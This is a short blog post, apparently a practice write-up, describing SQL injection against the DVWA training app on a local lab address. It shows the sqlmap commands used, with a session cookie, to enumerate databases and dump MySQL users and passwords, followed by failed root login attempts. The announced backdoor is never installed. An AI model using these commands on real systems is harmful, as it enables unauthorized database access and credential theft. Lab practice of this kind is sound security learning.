Now, I will to explain about how to installing backdoor in the database through SQL Injection. For this practice, I try to use DVWA as web application. DVWA is already available web application about SQL Injection and SQL Injection (Blind).
First, I choose SQL Injection as my target. In the user id form, I just type admin and then click submit, but does not happen. Then, I try to copy address (from the site after I submit the admin as user id). I use sqlmap and try this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py –u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit"
but, this is failed to get database. Then, I try to use tamper data from browser. From tamper data, I get cookie and copy it. With sqlmap, I try to scan again with this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101
/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4"
the result from the command above, I can see the parameter id is vulnerable and might me injectable.
Then, I try to enumerate DBMS databases with this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py –u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4" --dbs
From the result above, there are 10 databases. Then I try to search user and password from mysql with this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4" --users --password
we can see that mysql does't have password (null). After that, I try this command :
root@bt:/pentest/database/sqlmap# mysql -h 192.168.56.101
then :
root@bt:/pentest/database/sqlmap# mysql -h 192.168.56.101 -u root
and then :
root@bt:/pentest/database/sqlmap# mysql -h 192.168.56.101 -u root -p
but, from the command above I can't get access to mysql from the target.
No comments:
Post a Comment